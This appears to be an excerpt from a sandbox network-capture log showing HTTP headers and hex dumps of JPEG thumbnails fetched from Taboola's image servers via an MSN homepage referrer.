                                                              2021-10-20 13:08:56 UTC83OUTGET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F5282696e9e2aabcd3d346a6d7ed7591e.png HTTP/1.1
                                                              Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                              Referer: https://www.msn.com/de-ch/?ocid=iehp
                                                              Accept-Language: en-US
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                              Accept-Encoding: gzip, deflate
                                                              Host: img.img-taboola.com
                                                              Connection: Keep-Alive
                                                              2021-10-20 13:08:56 UTC84INHTTP/1.1 200 OK
                                                              Connection: close
                                                              Content-Length: 22230
                                                              Server: nginx
                                                              Content-Type: image/jpeg
                                                              access-control-allow-headers: X-Requested-With
                                                              access-control-allow-origin: *
                                                              edge-cache-tag: 350692997626492799788231350738665822473,335819361778233258019105610798549877581,29ecf9b93bbf306179626feeda1fab70
                                                              etag: "3a93f10be1638e14a4d5a8c3e39115a3"
                                                              expiration: expiry-date="Fri, 17 Sep 2021 00:00:00 GMT", rule-id="delete fetch for taboola after 30 days"
                                                              last-modified: Tue, 17 Aug 2021 13:05:16 GMT
                                                              timing-allow-origin: *
                                                              x-ratelimit-limit: 101
                                                              x-ratelimit-remaining: 100
                                                              x-ratelimit-reset: 1
                                                              x-envoy-upstream-service-time: 23
                                                              X-backend-name: CH_DIR:3FP7YNX3LMizprTZsG7BSW--F_CH_nlb801
                                                              Via: 1.1 varnish, 1.1 varnish
                                                              Cache-Control: public, max-age=31536000
                                                              Accept-Ranges: bytes
                                                              Date: Wed, 20 Oct 2021 13:08:56 GMT
                                                              Age: 3936644
                                                              X-Served-By: cache-wdc5520-WDC, cache-dca17772-DCA, cache-mxp6973-MXP
                                                              X-Cache: HIT, HIT, HIT
                                                              X-Cache-Hits: 1, 1, 2
                                                              X-Timer: S1634735336.230612,VS0,VE0
                                                              Vary: ImageFormat
                                                              X-debug: /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F5282696e9e2aabcd3d346a6d7ed7591e.png
                                                              X-vcl-time-ms: 0
                                                              2021-10-20 13:08:56 UTC85INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 05 05 05 06 06 06 06 08 09 08 09 08 0c 0b 0a 0a 0b 0c 12 0d 0e 0d 0e 0d 12 1b 11 14 11 11 14 11 1b 18 1d 18 16 18 1d 18 2b 22 1e 1e 22 2b 32 2a 28 2a 32 3c 36 36 3c 4c 48 4c 64 64 86 01 09 09 09 09 0a 09 0a 0b 0b 0a 0e 0f 0d 0f 0e 15 13 11 11 13 15 1f 16 18 16 18 16 1f 30 1e 23 1e 1e 23 1e 30 2a 33 29 27 29 33 2a 4c 3b 35 35 3b 4c 57 49 45 49 57 6a 5f 5f 6a 85 7f 85 ae ae ea ff c2 00 11 08 01 37 00 cf 03 01 11 00 02 11 01 03 11 01 ff c4 00 35 00 00 02 02 03 01 01 00 00 00 00 00 00 00 00 00 00 04 05 03 06 00 02 07 01 08 01 00 03 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 e4 73 37 de 40 2a ca c5 bd 73 94 98 a6
                                                              Data Ascii: JFIF+""+2*(*2<66<LHLdd0##0*3)')3*L;55;LWIEIWj__j75s7@*s
                                                              2021-10-20 13:08:56 UTC87INData Raw: a9 1a 8d 3d 46 0e 7a 76 9f 9e a5 3e 8d 19 d3 cb 17 b1 e2 25 c7 a4 0e 7e d8 fc 7f a8 e9 bc 5e 8f 53 ea e6 64 f2 9d ce 0b 07 cc 3d 3f 17 94 e7 75 5e ce 2d 13 f0 3c 0d 9a e9 be 87 cf 73 be 1f 74 28 d7 54 f5 01 23 4e f5 f3 63 1c 61 af e8 ff 00 19 03 9a f6 1d 95 7e 6e e4 7c dd f6 1f 9e fb 1b fe 1d d7 8e ce 52 cc e6 26 6a cb 99 fa 3e 47 2c 8b a7 75 f1 e3 3c 46 a1 8c eb 1e 8f cd 73 3e 0f 7c 18 df 54 6a 31 e2 fb 3f cb bb b7 b5 e0 3e fb 5f 98 8d 30 63 5a cf 37 75 3b 93 d2 41 87 5d e3 e6 7e e7 a7 6f 6e 16 53 b8 12 6b 3d 3f 0f 8c 4b e4 fd 9c 92 b9 89 3b f4 db 74 d9 82 d0 6c ce 10 4e e1 04 df 64 f9 d9 ea 7f a1 fe 7f 3e d1 e0 68 00 e7 ad 5b 9b be 8d c5 ea e9 f3 bf 6b d7 70 f5 2d b7 cd 1a 21 43 5f 53 c2 e5 12 f8 2f 67 21 15 11 a7 20 f0 23 0f 02 04 6e 18 02 c5 f6 ce 9f
                                                              Data Ascii: =Fzv>%~^Sd=?u^-<st(T#Nca~n|R&j>G,u<Fs>|Tj1?>_0cZ7u;A]~onSk=?K;tlNd>h[kp-!C_S/g! #n
                                                              2021-10-20 13:08:56 UTC89INData Raw: dd f7 c1 4d 10 59 d8 ae 21 3d 39 77 cc 22 55 05 0c 63 bc cd 6a fc 6c 9a f6 e4 6c 91 24 4a 7f 6f 9a ed 1f 35 1f ed e3 d5 2b 1a a1 64 a1 a6 af 95 f9 53 6a a4 fb c9 48 1c 59 62 af 56 49 38 d0 55 fe 71 d8 e0 62 10 60 79 37 76 5b 87 25 f0 f1 79 a6 3c e8 15 af 87 7b cd 31 25 35 87 0b ba 69 55 7c 5e a3 bd 94 ec 76 d0 d8 f8 db 00 9b 0d 33 13 59 ff 00 a8 68 97 66 3d cf 26 43 00 fc e7 32 10 70 36 8c 42 13 35 c0 0e d1 10 10 26 50 9b 6c 14 4d 06 82 d7 26 14 ab 4c 35 ed 9d 54 64 b2 c5 78 58 b9 3d 8c be 61 a7 57 16 6c af 08 77 c9 1b 48 a0 0e 95 09 51 05 83 1b d6 e5 09 86 90 c9 a2 2b 84 d7 0b 4e 69 b0 ea c9 9a 4f b4 74 90 b2 09 b7 2b b4 19 2f 9b 5d f1 33 ae 8c 75 3b 05 2c 7b 71 b8 b3 dc 79 a1 a9 50 ed 34 af 53 58 9a 69 3b 3b 5a 61 56 e2 d6 33 25 9d b1 51 f7 f2 19 ac 35
                                                              Data Ascii: MY!=9w"Ucjll$Jo5+dSjHYbVI8Uqb`y7v[%y<{1%5iU|^v3Yhf=&C2p6B5&PlM&L5TdxX=aWlwHQ+NiOt+/]3u;,{qyP4SXi;;ZaV3%Q5
                                                              2021-10-20 13:08:56 UTC91INData Raw: 73 0b ab 36 ea cb 6c d3 43 7b c8 e6 f3 d4 70 ec 6e cd b9 6b cc 4f 67 9a 12 e8 b1 24 a1 84 0c 28 06 78 49 0a bc 4c d2 95 1c 59 6c e9 29 85 27 de ab 28 a5 66 13 0e 5c d6 98 90 31 03 9c 31 d6 18 cb 74 24 30 8c 50 49 9b 34 2b 44 ba 0a d9 da b8 65 72 b1 7e df 01 d8 55 6b 82 8f 3e 4d 54 49 de 30 a6 55 84 7c 0a 5d ed 9b 89 6e 33 18 76 ac ff 00 1d c3 bb b2 39 7c 2b 6b 5d db 3b 63 3b 90 db 56 de b5 33 71 e0 11 61 0c ca e2 f5 8d c9 db a6 49 b2 b5 bc 8f 0a d9 cd e3 4b 7c 62 97 98 c2 46 e7 c3 a2 8d 59 14 41 cc 2e c2 de 2d 90 d1 4c 7c 9b e6 35 57 ea 00 83 17 c4 44 47 13 5a c9 05 67 5b 28 72 84 88 13 24 e4 72 74 16 bd 66 3a 5a 84 7b 07 49 65 ad da e4 2a 48 f8 65 9a 6b ba f8 65 a2 d4 fc b2 d4 b6 c5 25 79 da e7 32 70 58 c1 cc 64 d4 4f 12 2e d3 cf f1 0f 88 9b 7a 61 a8 b3
                                                              Data Ascii: s6lC{pnkOg$(xILYl)'(f\11t$0PI4+Der~Uk>MTI0U|]n3v9|+k];c;V3qaIK|bFYA.-L|5WDGZg[(r$rtf:Z{Ie*Heke%y2pXdO.za
                                                              2021-10-20 13:08:56 UTC94INData Raw: af f1 a9 d4 fe 80 b7 3d aa 45 75 87 c3 dc 2a 8d 14 af ee 4c 86 3a ee 1e fd 8c 75 e1 d7 e7 45 a6 c7 23 31 ad a0 2b fe 8b db d6 d8 59 1b 38 dc 8e 3f e5 da 18 ec 3a f1 98 d4 d4 8d 58 c7 c1 73 ea de 33 ef ea dd 19 0e 7d 31 64 b9 9f 58 0c 92 6a b8 eb 3c a9 da 76 3e c8 ad b3 e4 8e dc 0e 81 b3 f7 d7 90 a3 de 84 e1 83 ee 73 42 31 05 eb 33 3f e8 ef 87 01 3c ad 5a 98 e3 53 3f a4 1b 56 6b 6a 8e 3e 23 60 9e 41 91 b7 84 c9 e4 1f 97 c9 dc c9 58 0d 73 ef 45 a3 d6 cf 98 66 c7 c3 76 1c 4d 5a cc 38 b0 11 31 ce 89 71 3a 7d 68 28 9f 57 a8 44 f3 ea ed 29 19 9f 4d 59 28 a4 87 58 ab ff 00 3b 58 12 f8 c7 b6 0e 9a 8c a1 42 05 1c f3 26 3c 7b 99 7c 26 67 d6 53 6d 61 ac 51 ad 6d 6c dc 58 3a 89 a7 90 90 62 0b b2 11 3a 2f 7f a6 07 63 23 39 b6 e7 72 7e f1 84 f8 67 8e ca e4 e8 51 7e 70
                                                              Data Ascii: =Eu*L:uE#1+Y8?:Xs3}1dXj<v>sB13?<ZS?Vkj>#`AXsEfvMZ81q:}h(WD)MY(X;XB&<{|&gSmaQmlX:b:/c#9r~gQ~p
                                                              2021-10-20 13:08:56 UTC98INData Raw: 51 3f 86 62 7f f4 cc 4c ff 00 86 62 e6 3f 0c c7 94 7e 19 4e 63 f0 b7 5a ad e8 09 79 fb 91 d4 59 aa 9b a0 e2 20 48 03 33 5d d1 03 e1 ae e0 64 c7 53 88 88 e2 60 a5 92 13 05 d8 4f 98 e6 34 0e 8e 67 92 5d de be a2 19 2e 18 18 50 db 53 14 f8 6b 05 5c 14 29 85 32 41 06 71 24 e1 18 93 80 d2 ca 24 0c 54 27 66 4c fc c6 73 5e 25 bd 0a c4 c7 3a 95 c6 a5 23 3f 89 ac 33 f8 2a 63 3f 86 63 c6 7f 0d c6 0c fe 1f 8a ff 00 d3 f1 73 1c fa 76 3c 87 9f 4d ab 23 3f 6a b6 4e bb 46 0e 55 61 e9 91 ec 15 ae b8 b8 8d 57 64 48 8f 7d 72 10 3d b5 e5 ec 73 31 06 71 1e e7 56 97 ec e6 66 c9 20 19 01 d4 a0 24 d8 c2 02 59 9a d6 22 97 70 52 1d 0d 70 de 26 4e 45 82 a9 20 e8 a1 28 01 93 0f d7 8d 71 a9 08 d4 aa 27 47 5c 67 f0 da 22 5f 8b 18 d8 9e 7d 5c c6 f1 cf ab 35 24 66 7d 52 bd 63 1c 73 11
                                                              Data Ascii: Q?bLb?~NcZyY H3]dS`O4g].PSk\)2Aq$$T'fLs^%:#?3*c?csv<M#?jNFUaWdH}r=s1qVf $Y"pRp&NE (q'G\g"_}\5$f}Rcs
                                                              2021-10-20 13:08:56 UTC100INData Raw: 69 8c d6 d6 44 eb d1 45 39 74 e7 17 17 ca 51 38 68 6c e2 0d 86 f0 13 05 2c a5 ce ae c6 b5 a0 92 6f 00 2c 6e 2c e3 71 75 71 11 0d 36 a6 39 34 76 01 2f 82 d2 d2 4c 26 b4 b4 41 70 3c 96 c4 27 59 c7 a2 37 88 e4 89 be 96 4d bb 60 a0 2d bd 87 54 1a 0c 0c c2 7a c7 eb 09 a3 ba 41 9b 3b 92 70 75 84 b4 f7 b6 50 fd da 41 28 10 48 e8 8c 4c 34 44 5d 38 80 41 db 54 44 b7 51 a7 fa 51 b2 01 a5 b0 e6 cc 4c 48 9d 65 43 09 96 b5 a1 d6 83 97 9f fd a3 76 f8 de 67 41 24 eb ff 00 61 07 99 2e ce e1 07 ad 80 27 79 4e 75 60 d3 fc 40 48 93 e1 1b 01 ca 37 2a 6a 02 44 32 21 d1 dd 3a 83 1c d7 1f c5 7b 36 0c 1b 43 03 ea 09 a8 5b b3 41 ed 73 88 22 58 24 1b 19 4e aa 1c 08 c8 47 9a a2 f2 e1 04 df 9a 76 ae 94 2c 00 e4 8a b8 6a 1a 39 37 51 fb aa 60 66 d3 d1 3c e6 02 ff 00 03 74 39 10 df 84
                                                              Data Ascii: iDE9tQ8hl,o,n,quq694v/L&Ap<'Y7M`-TzA;puPA(HL4D]8ATDQQLHeCvgA$a.'yNu`@H7*jD2!:{6C[As"X$NGv,j97Q`f<t9
                                                              2021-10-20 13:08:56 UTC101INData Raw: 77 89 61 61 3b a2 d7 30 fe c5 67 e6 c3 f0 28 b9 9e 7e 8a 8e 25 b4 dc 01 74 b0 eb e4 9e d6 ea 37 57 92 08 4e 6c 15 70 8a 21 05 2b 88 f0 ac 17 12 0d 35 da e0 f1 a5 46 58 ac ae e6 83 61 5a 66 27 aa f8 0f 44 4a 08 18 59 9d cd 49 52 50 ec a7 aa 38 c0 60 1a 5f 19 43 13 87 3a e6 1f 05 ed f0 ff 00 8c 8e a1 34 02 6d 04 2a 55 0b 06 47 5d bb 1e 48 d3 9b 84 e0 9c cd d0 e4 51 45 10 16 5e c1 ef 9f 71 9a 84 f8 0f 81 c8 1f 97 60 6c af ae 3d 98 82 fa 4e ee 8b 46 ce 54 78 86 16 a8 1d fc 8e fc 2e 4c a8 e6 81 69 6a 25 95 1b 2d 75 d1 61 f9 5d 39 12 8c 15 70 85 c2 04 a6 9f bb 6e a1 55 25 b5 41 04 68 d4 c3 9d d1 11 65 c4 f1 a3 0d 41 ac 63 bf 89 52 c0 8b 5b 72 a9 d6 10 9b 50 15 43 17 5e 8c 7b 3a 86 3f 09 b8 58 1c 53 31 74 cb 9b dd a8 df 13 56 77 9a 64 58 a7 49 45 a8 27 26 bb b1
                                                              Data Ascii: waa;0g(~%t7WNlp!+5FXaZf'DJYIRP8`_C:4m*UG]HQE^q`l=NFTx.Lij%-ua]9pnU%AheAcR[rPC^{:?XS1tVwdXIE'&
                                                              2021-10-20 13:08:56 UTC103INData Raw: 56 0f 89 55 a4 e6 b2 ab b3 53 98 93 a8 40 c8 04 19 07 42 15 be 28 9d 61 49 98 5b 21 e9 db 6f 71 a2 48 10 b8 c6 37 eb 78 c2 d6 19 a3 46 58 cf 33 bb bd e9 59 90 79 4d aa 53 2b aa 75 d3 2a 02 b0 78 ea 98 67 7e 2a 7b b5 52 ad 4e b3 03 e9 b8 10 7d 42 0a 02 28 38 ec af d9 e5 ee 71 7c 61 c1 e0 cb 58 7f 8d 5e 58 cf 21 bb 90 00 00 07 dd 07 26 54 85 4a b2 a7 56 56 1f 13 56 83 f3 d2 74 1f 91 58 7e 31 42 a4 0a c3 d9 bb 9e c8 10 e6 e6 6b 83 87 31 db e6 7d cd 10 b9 93 a2 c7 63 0e 3b 17 52 bf f4 78 69 8e 4d 1f 78 0a 63 c8 54 eb 26 57 4d aa 0a a3 89 ab 44 cd 2a ae 67 45 47 8d 57 6d ab 35 b5 07 3d 0a a7 c5 70 4f 12 6a 16 9e 45 a5 7f ff c4 00 3f 11 00 01 03 02 03 05 06 04 04 04 04 07 01 00 00 00 01 00 02 11 03 21 04 12 31 10 13 41 51 61 05 20 22 32 71 81 14 42 52 91 a1 b1
                                                              Data Ascii: VUS@B(aI[!oqH7xFX3YyMS+u*xg~*{RN}B(8q|aX^X!&TJVVVtX~1Bk1}c;RxiMxcT&WMD*gEGWm5=pOjE?!1AQa "2qBR
                                                              2021-10-20 13:08:56 UTC104INData Raw: 81 f0 3c f2 08 10 60 f3 3f 98 52 0c 9b 19 09 ee 2d 2d 87 11 31 30 63 88 5b c7 98 cd 56 a4 0b c6 6b 20 e2 00 96 b7 35 a6 5a df 42 98 32 e1 9b 9a 93 3c 51 2d 0d cb 73 e9 0b 25 27 11 e0 30 4c 59 ce 1c 56 ea 91 03 c2 f1 a7 11 69 1e 8b b2 b0 ad 35 0d 79 7c 32 cd 0e 8d 4e da 2f 0c a8 1e e1 24 3b 4f 45 57 1a d7 b2 05 22 df 10 32 35 0b 0f 8b 18 88 04 dc 0b a6 10 58 0b 48 22 f7 09 ad 86 34 72 1b 20 67 94 7c cc f7 2a a5 e9 bb ad ad d5 56 68 ca 3f 55 4d 90 f7 44 80 00 d3 aa 32 34 27 de 0a 04 be 98 b3 62 67 52 13 a9 b6 0c b5 c2 78 82 1c 10 a9 48 31 ed de b6 49 06 f6 41 8f 16 07 30 8b 41 07 a8 57 6b a0 b5 c2 f6 91 d5 57 bd 52 22 d0 07 de 42 68 b8 93 a9 ff 00 c8 ff 00 b9 17 17 4f 3f d4 8f f7 2a cf 0c 14 c9 3c dd ec 01 72 7b c8 cc 00 be 53 02 0e a0 06 fe 65 00 fa 95 05
                                                              Data Ascii: <`?R--10c[Vk 5ZB2<Q-s%'0LYVi5y|2N/$;OEW"25XH"4r g|*Vh?UMD24'bgRxH1IA0AWkWR"BhO?*<r{Se
                                                              2021-10-20 13:08:56 UTC105INData Raw: 81 02 77 83 ec b7 75 b8 00 7d d6 4a a3 56 7e 2b 35 b8 83 d6 ca a3 24 97 b7 5e 21 36 a2 17 41 c8 8d 48 40 df 5e 08 5d 0e bb 4f 7c 77 1d a1 54 ea 66 0e 11 76 b8 84 01 4f 7e a0 c0 0b e1 d8 ea 21 af 6d cd e7 92 a9 85 af 4c f9 73 0e 61 3e 98 74 96 98 77 10 81 2c 30 e1 08 38 42 0a 10 04 00 b5 5c 51 00 a7 01 df 1d c2 aa bc d3 c4 54 22 75 54 71 22 a5 30 ec b7 e4 b0 58 57 e2 31 19 ea 4e 46 0c ce 06 e2 4e 81 3d 97 28 b4 85 52 85 2a 93 9d 82 79 8d 56 22 8b a8 bb 23 e1 cd 37 69 50 d6 bc 6b 09 b0 a4 4a 28 22 36 39 72 f4 1d c0 09 20 34 49 26 02 18 1a 63 2b 5d 5f c6 46 92 13 d8 ea 6f 2c 7e a3 b8 56 2d e6 9e 25 f9 49 b8 12 a9 54 a8 1e 03 09 2e 71 00 30 71 92 b0 d8 6f 87 c3 32 96 ae d5 e7 99 29 cc 4e a6 9e c5 56 93 6a 30 b1 e2 c5 62 70 b5 28 f9 84 b7 81 1c 42 a6 ec a4 49
                                                              Data Ascii: wu}JV~+5$^!6AH@^]O|wTfvO~!mLsa>tw,08B\QT"uTq"0XW1NFN=(R*yV"#7iPkJ("69r 4I&c+]_Fo,~V-%IT.q0qo2)NVj0bp(BI
                                                              2021-10-20 13:08:56 UTC107INData Raw: 63 73 93 82 a2 d2 f1 ff da 00 08 01 01 00 0a 3f 00 90 aa 3e a7 20 9b 2a 76 3b e3 28 a7 76 ed 37 b7 6d b5 2b 6c 6b 15 88 3b 33 1a 05 bc fe 67 18 17 ea a0 88 10 a1 49 d2 ca 70 87 64 04 30 1c e2 24 b0 8e ec 6d f1 10 45 f3 92 c4 25 88 a4 71 31 54 a7 45 05 49 df 93 9d b9 8e 3d 7d a3 b1 d6 11 8f d4 1a ba ac 90 f6 a3 b3 14 48 05 3e 37 dc 11 41 89 e7 1a 33 33 87 b8 d7 50 df 7d 88 be 06 0d 2a b4 b7 e0 0f 17 5e 24 60 0e 91 b1 a3 b8 a3 b1 23 7f 99 c4 56 40 10 48 14 10 4b 01 bf e2 2f 3b e2 3e f5 5d 90 c4 1d 22 a8 8c 62 7a 40 4a ba 9a ad 88 61 5f 7a 86 3f 4c ba 4a ac 69 77 a4 8a b2 ad b9 bc 5e cc a9 48 e4 04 09 3b fc 8d f7 c4 9c 2e a4 2a c4 1d a2 ad b8 ac e9 56 75 b3 2b e8 6b 8d 8f 7a 93 51 d3 63 19 a6 8d c9 49 58 9d c1 1c df 18 ea 15 36 d3 28 d2 75 fd fa 23 73 e9 8a
                                                              Data Ascii: cs?> *v;(v7m+lk;3gIpd0$mE%q1TEI=}H>7A33P}*^$`#V@HK/;>]"bz@Ja_z?LJiw^H;.*Vu+kzQcIX6(u#s
                                                              2021-10-20 13:08:56 UTC108INData Raw: 5a e8 dd 1d 8e c4 e2 c8 da d4 b0 74 0a 36 53 4c 7e 63 e7 86 45 92 32 c1 ca e8 03 7f 85 42 e3 b9 24 27 63 76 68 0a 6e 6f eb 9d c0 87 8a db c6 bc 2c e4 da 83 2b b3 e9 32 6c 46 a2 4d 0c 95 82 d0 28 e4 eb 53 b0 a0 76 18 b2 18 b4 40 85 e2 62 f2 a3 6e 80 3b 1a bb 3b d6 d5 91 0e ab b1 06 29 66 64 13 25 ae a0 af 4b b0 da 80 bc 7e bf aa 74 d4 ce a0 88 ce a0 43 5e fb 9d f6 c1 14 b3 e9 77 40 2b 42 81 dd 4e 4f 19 f9 c0 a3 b5 8e bb a6 94 7a ee 73 b6 83 a6 89 3a 88 d2 51 6d 1c bb 59 52 6e 97 3a 67 2e b2 2a 38 b8 e9 c2 92 1c ac 7a 41 c6 68 64 2c 80 27 74 f7 40 e0 92 6a 80 e2 8e 4d 14 9d 9d 51 98 9e ce e3 2a 74 11 18 af 2c 1e ce 9e 44 75 7e aa 0d 05 6c 5f f7 6e ca 06 fc e9 19 d7 4b 4d a5 dd bd 9e af b4 64 8b 0d 0c 8f 91 b4 42 32 bd 93 74 cc 8c 5f 62 58 99 cc 75 59 d0 04
                                                              Data Ascii: Zt6SL~cE2B$'cvhno,+2lFM(Sv@bn;;)fd%K~tC^w@+BNOzs:QmYRn:g.*8zAhd,'t@jMQ*t,Du~l_nKMdB2t_bXuY
                                                              2021-10-20 13:08:56 UTC109INData Raw: b2 65 3d 47 fc c9 79 e2 b5 a8 b4 ae 9b 8b 57 3a b3 a5 12 32 9d 3a 67 54 ad 12 5a 50 93 4f ee c9 34 a3 47 a1 9c 52 15 0f 64 eb 04 d9 d2 e4 62 e9 62 42 3e ba 20 95 68 c2 8f 46 44 c5 65 9f 52 d8 6e e1 5e a4 14 1c d1 04 0e b5 4f d3 18 1e b2 27 95 11 57 4b 0f ca 04 92 7e e6 eb 54 62 b4 11 08 66 10 9e ef 71 49 eb 02 92 7e 71 01 8e a7 a3 89 52 67 d4 8e 16 7e 9f a5 23 6d f7 b9 ba 9c 22 58 7f 2b 8d 6e a9 96 08 13 d9 f0 39 3f 22 ce d9 69 d3 c0 91 29 f3 08 a1 6f df ec a8 a3 98 15 32 3c d2 c6 f6 c0 39 01 59 d1 71 3a b0 d2 44 4a c4 19 fb 81 83 5d f6 92 67 51 d0 9d 41 e1 94 c6 cb 60 79 16 1b de 3c b0 6a ee cb 29 ef ea 26 f7 1b 6d 67 6c 3c 80 18 0e e9 3e 47 06 c9 cd f3 bd 51 f2 23 38 3c 9f 4e 4f e0 4e 7f d4 99 e4 d3 7f aa a0 00 72 bf 31 a1 45 0d bb 57 09 fc 0e 69 63 d1
                                                              Data Ascii: e=GyW:2:gTZPO4GRdbbB> hFDeRn^O'WK~TbfqI~qRg~#m"X+n9?"i)o2<9Yq:DJ]gQA`y<j)&mgl<>GQ#8<NONr1EWic
                                                              2021-10-20 13:08:56 UTC111INData Raw: db 69 07 40 2b b9 6f 1a ce 9e fb 28 d4 37 6a 18 ea 55 e7 6f 0d 4a 0e 74 cc c2 30 a8 85 ab 96 24 ee 7e 83 11 c3 30 04 46 ea c7 4a b1 7f e0 8b 93 a0 46 10 ab 32 1e f7 c3 d3 ae 9f de 73 42 c9 22 73 b5 2b b1 76 04 1f 24 41 80 3c d4 f7 e6 64 6d 64 7d 03 2e 77 e5 e9 d9 d4 56 e4 f5 4f a1 3e a0 0c ef b6 93 21 fd 91 40 7a 0f b5 d3 3d 37 0f d4 9d 3f 85 0b c2 f0 75 dd 2c b2 90 9c 24 82 43 6a 33 aa 4e aa 03 27 52 cc 46 b5 9d bc 96 b2 0a f6 b2 3f 51 d2 fe 51 16 b8 c0 2c 4b 42 ae 01 20 86 3e 03 09 40 d1 c6 9b 03 4c 80 ec b7 e0 33 b2 73 fd a0 e9 99 27 0c 28 69 24 3f 99 db 6d b0 4d 34 e0 89 63 54 d4 77 66 a0 c7 c5 f7 ce a9 27 99 9a 4b 94 05 89 35 1c 33 85 fe ea 23 a2 31 f2 67 39 d3 c0 8a 39 02 c9 fa 9d ce 17 f9 9d 80 f4 03 07 b8 61 1e 86 b0 fd 72 c6 47 a9 41 ad 49 be e2
                                                              Data Ascii: i@+o(7jUoJt0$~0FJF2sB"s+v$A<dmd}.wVO>!@z=7?u,$Cj3N'RF?QQ,KB >@L3s'(i$?mM4cTwf'K53#1g99arGAI
                                                              2021-10-20 13:08:56 UTC112INData Raw: f6 e2 4c 51 42 a7 53 3c a2 11 13 f3 f9 a0 c7 3a f9 67 ea 7d 9d ed 19 7d a7 d3 41 d9 b4 ad d6 7b 39 15 df a2 e9 3c 0b db 69 cf 6b ff 00 67 3d 8f d2 74 50 13 ff 00 14 96 28 a7 5e a7 ab 3a 22 05 a6 10 82 9c b6 75 6b ed ae 8f da 9e d1 e8 d6 2e 9e 72 24 6f c8 ba 51 38 1d 34 5a 0a ca ed e4 c4 5a e6 e5 45 fb c1 23 ab 9d 74 13 ca 93 b9 ce ea 0f c4 9d c9 fb 64 ca d2 84 8c 0f 16 3c 66 e6 2a 7d 3e 2f e3 e9 84 57 bb e7 78 2a 29 e5 41 f5 3a f7 fc 73 9e 9e 51 ff 00 d4 e7 f7 29 ef 9e 3e 9f ab ec ff 00 29 85 1c ac 73 76 47 52 76 8a 36 6d 27 71 9d 59 09 d2 8e 95 07 6c dd de 9e f5 76 23 fe dd ef a7 8c ea 64 91 65 69 55 de 56 66 12 39 b6 70 49 d9 89 dc 9c 9e 77 91 83 3b 4d 23 48 ce 40 a0 58 b1 36 46 12 d7 76 49 bb fb 16 e9 ed 09 63 1f 20 55 5b f4 15 02 c7 a2 32 47 32 1f 15
                                                              Data Ascii: LQBS<:g}}A{9<ikg=tP(^:"uk.r$oQ84ZZE#td<f*}>/Wx*)A:sQ)>)svGRv6m'qYlv#deiUVf9pIw;M#H@X6FvIc U[2G2
                                                              2021-10-20 13:08:56 UTC113INData Raw: e0 77 3f 86 40 3b b6 03 20 a6 ad aa b9 d5 f3 1c 9c 76 0a ba 88 2c 1c d1 60 7e 22 6c 50 15 c1 ac 98 c6 a9 ab b4 d9 bc fb c4 82 28 ff 00 0c 70 37 50 5d 56 9a c5 5d b1 06 b3 65 bd 21 86 d4 36 e7 c7 11 58 0d 20 8b af 5d c9 cf cd 6c 4e e6 ec 0e 3e 7f a7 fa 63 21 ae 41 db 03 0c af 72 76 ad a0 9d b7 50 40 60 41 15 8f f9 41 90 c4 14 91 4c 18 81 44 d7 1b d6 10 86 57 01 50 8e e5 8b b0 48 e3 e5 8a ec e4 80 cf 75 49 f1 92 bb 8a 1f d7 00 96 dc 1d 00 2a 82 be 5b 6d f4 c4 d8 80 18 59 d8 10 77 b3 76 2f 05 f2 7f 4c 30 7b 8a fa 1c 24 7d 0e 03 7c 51 ac ff d9
                                                              Data Ascii: w?@; v,`~"lP(p7P]V]e!6X ]lN>c!ArvP@`AALDWPHuI*[mYwv/L0{$}|Q


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              9192.168.2.549833151.101.1.44443
                                                              TimestampkBytes transferredDirectionData
                                                              2021-10-20 13:08:56 UTC83OUTGET /taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_pad%2Cb_auto/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Faedbb0638c2ccabdeb958fc2d93204dc.jpg HTTP/1.1
                                                              Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                              Referer: https://www.msn.com/de-ch/?ocid=iehp
                                                              Accept-Language: en-US
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                              Accept-Encoding: gzip, deflate
                                                              Host: img.img-taboola.com
                                                              Connection: Keep-Alive
                                                              2021-10-20 13:08:56 UTC86INHTTP/1.1 200 OK
                                                              Connection: close
                                                              Content-Length: 5940
                                                              Server: nginx
                                                              Content-Type: image/jpeg
                                                              access-control-allow-headers: X-Requested-With
                                                              access-control-allow-origin: *
                                                              edge-cache-tag: 479804938326989479466645211257047552033,376453762558522630792330837908987580524,29ecf9b93bbf306179626feeda1fab70
                                                              etag: "83b82670ae366ff9ff6260e1c3bd76cd"
                                                              expiration: expiry-date="Sun, 17 Oct 2021 00:00:00 GMT", rule-id="delete fetch for taboola after 30 days"
                                                              last-modified: Thu, 16 Sep 2021 03:57:03 GMT
                                                              timing-allow-origin: *
                                                              x-ratelimit-limit: 101
                                                              x-ratelimit-remaining: 100
                                                              x-ratelimit-reset: 1
                                                              x-envoy-upstream-service-time: 66
                                                              X-backend-name: LA_DIR:3FP7YNX3LMizprTZsG7BSW--F_LA_nlb201
                                                              Via: 1.1 varnish, 1.1 varnish
                                                              Cache-Control: public, max-age=31536000
                                                              Accept-Ranges: bytes
                                                              Date: Wed, 20 Oct 2021 13:08:56 GMT
                                                              Age: 1818790
                                                              X-Served-By: cache-wdc5542-WDC, cache-dca17745-DCA, cache-mxp6956-MXP
                                                              X-Cache: HIT, MISS, HIT
                                                              X-Cache-Hits: 1, 0, 515
                                                              X-Timer: S1634735336.230813,VS0,VE0
                                                              Vary: ImageFormat
